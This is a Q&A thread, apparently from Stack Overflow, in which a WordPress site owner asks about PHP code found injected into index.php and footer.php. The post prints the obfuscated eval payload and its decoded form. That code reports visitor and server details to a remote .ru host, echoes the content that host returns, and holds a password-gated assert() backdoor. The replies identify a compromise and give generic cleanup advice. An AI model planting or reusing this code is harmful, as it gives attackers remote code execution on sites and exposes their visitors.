# Random php insertions on web server

Tags: php, wordpress

Anyone come across this before? 
   `@$strings(str_rot13('riny(onfr64_qrpbqr("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"));'));`

Decoded it turns out to be

```
if (isset($ibv)) { echo $ibv; } else { if(!empty($_COOKIE["client_check"]))die($_COOKIE["client_check"]);if(!isset($c_["HTTP_ACCEPT_CHARSET"])){$temp = dirname(__FILE__)."/ch";$charset = file_get_contents($temp);if (!$charset  && !isset($_GET["charset"])){$str = file_get_contents("http://".$_SERVER["HTTP_HOST"]."/?charset=1");if(preg_match("/windows-1251/i", $str)){$charset = "windows-1251";}elseif(preg_match("/utf-8/i", $str)){$charset = "utf-8";}else{$charset = "windows-1251";}$handle = fopen($temp, "w+");fwrite($handle, $charset);fclose($handle);} else {$charset = "utf-8";} $c0 = $charset;}else{$c0=$c_["HTTP_ACCEPT_CHARSET"];}if(function_exists("curl_init")){$c1=curl_init("http://gjdsuexnvzvo.ru/get.php?d=".urlencode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"])."&u=".urlencode($_SERVER["HTTP_USER_AGENT"])."&c=".$c0."&i=1&ip=".$_SERVER["REMOTE_ADDR"]."&h=".md5("dfce64a79114e986dc681c809f52f43d".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"].$_SERVER["HTTP_USER_AGENT"].$c0."1"));curl_setopt($c1,42,false);curl_setopt($c1,19913,true);$ibv =  curl_exec($c1);curl_close($c1);}elseif(ini_get("allow_url_fopen")==1){$ibv = file_get_contents("http://gjdsuexnvzvo.ru/get.php?d=".urlencode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"])."&u=".urlencode($_SERVER["HTTP_USER_AGENT"])."&c=".$c0."&i=1&ip=".$_SERVER["REMOTE_ADDR"]."&h=".md5("dfce64a79114e986dc681c809f52f43d".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"].$_SERVER["HTTP_USER_AGENT"].$c0."1"));} if (isset($ibv)) { echo $ibv; } if(isset($_REQUEST["p"]) && $_REQUEST["p"] == "1c168bc1") { @assert($_REQUEST["c"]); }}
```

I've noticed this code pop in a few on my index.php files as well as footer.php in Wordpress.

Comment: You've been hacked.

Comment: As @JayBlanchard says, you been hacked. If you have backups and logs then check them for unknown IP's to find out where the hack was from, also check out where the error in your code is to find the security leak the hacker  used.

Comment: Looks similar to http://stackoverflow.com/questions/32974324/new-code-added-on-server-inside-laravel-framework-file-that-gave-error

Comment: Hacking questions are off-topic on SO.

Answer (score 1, accepted):

This is a very typical insertion to a "hacked" Wordpress site, whereby someone has gained access to your website via what is probably a dodgy plugin, or a very basic Wordpress installation that hasn't had any security additions.

I've only ever made one Wordpress site and this happened to me too, and unfortunately it has a tendency to spread throughout other files if your installation is in a different directory. There are probably a few new files in several directories now, and you'll need to go through them one by one to remove them. It's tedious I know, but it's - to my knowledge - the only way to make sure that it's safe.

Then you need to reinstall your Wordpress site and make sure you secure it. There are a bunch of guides on Google, if you just search "make my wordpress site secure". There are plugins etc. that you can install in order to secure it, and I highly recommend doing this straight away, as at the moment there'll be a backdoor there somewhere that the "hacker" can use to access your files.

*I use the word "hacker" lightly, because it's most likely some kid running downloaded scripts so he can brag to his internet buddies that he's a hacker*